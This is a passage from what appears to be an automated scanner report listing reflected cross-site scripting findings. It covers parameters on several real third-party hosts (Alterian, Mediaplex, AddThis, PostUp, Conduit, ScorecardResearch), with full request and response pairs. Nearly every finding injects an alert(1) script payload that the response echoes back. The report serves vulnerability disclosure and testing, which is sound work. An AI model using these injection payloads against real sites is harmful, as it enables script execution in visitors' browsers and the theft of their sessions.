GET /tracking.aspx/gettoken/?callback=this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46&noCacheIE=1298762276937 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:20:10 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:09 GMT
Content-Length: 137

this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46({"ClientID":"2","Token":"d3a7e42c-0813-438b-a35b-6ce10d72ee05"});

3.10. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitevents/

Request

GET /tracking.aspx/submitevents/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&Session=25aa86a5-ea98-45f3-a174-e3469a6e00b9&callback=this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f&Events=%5B%7B%22EventID%22%3A%221%22%2C%22EventTime%22%3A%22%2FDate(1298762276936)%2F%22%2C%22Asset%22%3A%22http%3A%2F%2Fwebcontent.alterian.com%2F%7Chttp%3A%2F%2Fwebcontent.alterian.com%2F%22%2C%22Value%22%3A%22%22%7D%5D&noCacheIE=1298762279411 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:31 GMT
Content-Length: 90

this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f({"Result":"1"});

3.11. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitsession/

Request

GET /tracking.aspx/submitsession/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&callback=this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986&timeoffset=360&scrres=1920%20x%201200&username=&trackedsite=alterian-content-management.com&ref=unknown&noCacheIE=1298762278213 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:20:30 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:29 GMT
Content-Length: 212

this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986({"Session":"84f479f4-e135-4bfd-8e26-2c450d11bf62","SessionDurationInMinutes":"15","NumofEventsinaSubmit":"30","SubmitDuration":"5000"});

3.12. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 527
Date: Sun, 27 Feb 2011 02:31:59 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0">
...[SNIP]...

3.13. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a'%3balert(1)//2ee66e943dc HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 527
Date: Sun, 27 Feb 2011 02:32:18 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a';alert(1)//2ee66e943dchttp://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=773834215">
...[SNIP]...

3.14. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c'%3balert(1)//a8fa310d924=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 530
Date: Sun, 27 Feb 2011 02:32:52 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c';alert(1)//a8fa310d924=1http://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=773834215">
...[SNIP]...

3.15. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.virtusa.com%2Fpractices%2Fdwbi%2F&callback=_ate.cbs.sc_httpwwwvirtusacompracticesdwbidcd04<script>alert(1)</script>c3a0525ddd9 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/practices/dwbi/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298915503.60|1297806627.66; dt=X; uid=4d5af32c71c2e1a5; psc=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Tue, 01 Mar 2011 13:40:43 GMT
Content-Length: 98
Connection: close

_ate.cbs.sc_httpwwwvirtusacompracticesdwbidcd04<script>alert(1)</script>c3a0525ddd9({"shares":2});

3.16. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.postup.com
Path:   /TCTUL001/twidget/1.jsonp

Request

GET /TCTUL001/twidget/1.jsonp?jsonp=jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71&numAuthors=7&numPosts=0&bf=tech&uip=&ua=&ref=http%3A%2F%2Ftechcrunch.com%2F2011%2F02%2F16%2Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%2F&qh=TechCrunch&format=300x600 HTTP/1.1
Host: api.postup.com
Proxy-Connection: keep-alive
Referer: http://www.tweetup.com/twidget/twidget.2.300x600.html?partner=TCTUL001&keyword=TechCrunch&backfill=tech&refurl=http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:32:03 GMT
Content-Type: text/javascript; charset=UTF-8
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: bc=9CE434E0-6353-4F68-9196-9FD9DBD5DD9E;Path=/;Expires=Wed, 24-Feb-21 02:32:03 GMT
Set-Cookie: sc=6148C463-8CE9-4536-981B-E1A093F9C2BB;Path=/
Set-Cookie: bp=NR6mPz0SXEsXB_t8NNHvEsKZO0M;Path=/
CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT
Content-Length: 19542

jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71({"users":[{"created_at":"Wed May 19 20:08:01 PDT 2010","description":"News and opinions on technology, internet \u0026 media. Focused on investors, companies and products impacting social and commerci
...[SNIP]...

3.17. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.conduit-banners.com
Path:   /TechCrunchApp-Techcrunch_APP

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee'%3balert(1)//b377350152c&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 27 Feb 2011 03:31:08 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4674

function imgToGoOnLoad__806157278(imgObj) {var elm = imgObj,func__806157278 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-App'
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee';alert(1)//b377350152c" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__806157278(this);" >
...[SNIP]...

3.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=876688<script>alert(1)</script>2d0cdbe6589&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:51 GMT
Date: Sun, 27 Feb 2011 16:44:51 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"876688<script>alert(1)</script>2d0cdbe6589", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955a70f0<script>alert(1)</script>5846377f9ec&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:02 GMT
Date: Sun, 27 Feb 2011 16:45:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955a70f0<script>alert(1)</script>5846377f9ec", c15:"", c16:"", r:""});

3.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15=4dfb7<script>alert(1)</script>028085d548b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:02 GMT
Date: Sun, 27 Feb 2011 16:45:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"4dfb7<script>alert(1)</script>028085d548b", c16:"", r:""});

3.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)</script>3733a91cc15&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:52 GMT
Date: Sun, 27 Feb 2011 16:44:52 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
e=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113bc9c3<script>alert(1)</script>3733a91cc15", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20aecfe<script>alert(1)</script>494c6cd0f61&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:53 GMT
Date: Sun, 27 Feb 2011 16:44:53 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
n(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20aecfe<script>alert(1)</script>494c6cd0f61", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=48378fcd2<script>alert(1)</script>164c2634538&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:59 GMT
Date: Sun, 27 Feb 2011 16:44:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"48378fcd2<script>alert(1)</script>164c2634538", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=283806569b<script>alert(1)</script>98b62b0333a&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:00 GMT
Date: Sun, 27 Feb 2011 16:45:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
